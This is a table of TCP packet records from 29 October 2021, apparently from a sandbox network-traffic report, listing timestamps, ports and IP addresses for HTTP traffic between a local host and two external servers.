Oct 29, 2021 20:50:45.910711050 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910752058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910768986 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.910790920 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910851002 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.911051035 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.911123037 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.911166906 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.911228895 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.911545992 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.911581993 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.911623001 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.956640005 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.956696987 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.956738949 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.956767082 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.956779957 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.956815004 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.956819057 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.956880093 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.956887960 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.956990004 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957031965 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957050085 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.957122087 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957161903 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957181931 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.957484007 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957526922 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957559109 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.957566977 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.957627058 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.957931042 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.958206892 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.958240986 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.958267927 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.958357096 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.959642887 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.959795952 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:46.044965029 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:50.075287104 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.075326920 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.141508102 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.141557932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.254838943 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.293004990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.293040991 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.359379053 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.359399080 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.482783079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.506480932 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.506525993 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.573069096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.573117971 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684120893 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684148073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684165001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684181929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684199095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684215069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684221983 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.684228897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684277058 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.684304953 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684323072 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.684323072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.684398890 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.735155106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.737483978 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.750668049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750716925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750756025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750833035 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750873089 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750891924 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.750911951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750926018 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.750952959 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.750992060 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751004934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.751032114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751044035 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.751070976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751130104 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751130104 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.751169920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751208067 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751245975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751257896 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.751287937 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751300097 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.751327038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751365900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751382113 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.751405001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.751461029 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.803839922 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.803894043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.804080963 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.820444107 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820497036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820538044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820563078 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.820576906 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820616961 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820651054 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.820656061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820744991 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.820751905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820791006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820830107 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820842981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.820893049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820934057 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.820960045 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.820974112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821016073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821028948 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821055889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821096897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821100950 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821137905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821177006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821198940 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821216106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821257114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821264982 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821296930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821336985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821346045 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821377993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821418047 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821434975 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821463108 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821501970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821506023 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.821542025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821578026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.821589947 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.822139978 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822190046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822230101 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.822232008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822282076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822283030 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.822324991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822362900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822381020 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.822392941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822432995 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822448969 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.822478056 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.822532892 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.870454073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.870503902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.870531082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.870558023 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.870673895 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.870733976 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.886996031 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.887022018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.887033939 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.887048006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.887200117 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889182091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889204979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889219046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889236927 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889256001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889269114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889282942 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889301062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889314890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889327049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889339924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889352083 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889364958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889378071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889389992 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889385939 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889409065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889426947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889439106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889446020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889465094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889467001 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889484882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889497042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889504910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889588118 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889600039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889617920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889632940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889659882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889659882 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889699936 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889700890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889734983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889751911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889765024 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889770031 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889777899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889792919 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889806032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889818907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889826059 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889832973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889847040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889862061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889870882 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889875889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889892101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889894009 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889905930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889919043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.889930964 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889952898 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.889986992 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.936952114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.936979055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.937051058 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.937067986 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.937134027 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.937191010 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.953598976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.953640938 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.953668118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.953695059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.953762054 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.953823090 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955591917 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955621958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955647945 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955676079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955704927 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955722094 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955735922 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955756903 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955765009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955790043 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955792904 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955821991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955845118 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955849886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955878019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955904961 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955907106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955933094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955952883 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.955959082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.955987930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956013918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956015110 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956043005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956072092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956082106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956099987 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956120968 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956126928 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956155062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956177950 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956181049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956212044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956238031 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956240892 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956267118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956286907 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956295013 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956325054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956347942 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956351042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956378937 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956399918 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956404924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956433058 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956451893 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956459999 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956489086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956501007 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956516981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956542969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956559896 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.956568956 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.956613064 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:50.958780050 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.958810091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:50.958925962 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.021234989 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.021301031 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.087675095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087707043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087723017 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087744951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087765932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087785959 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087801933 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087825060 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087847948 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087867975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087889910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087909937 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087927103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087948084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087959051 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.087970018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.087992907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088017941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088037968 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088059902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088063002 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088083029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088095903 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088104963 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088124990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088128090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088149071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088171005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088190079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088200092 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088208914 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088232040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088234901 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088255882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088260889 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088280916 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088299990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088304043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088327885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088347912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088372946 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088375092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088396072 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088413000 CEST	49866	80	192.168.2.4	45.141.84.21
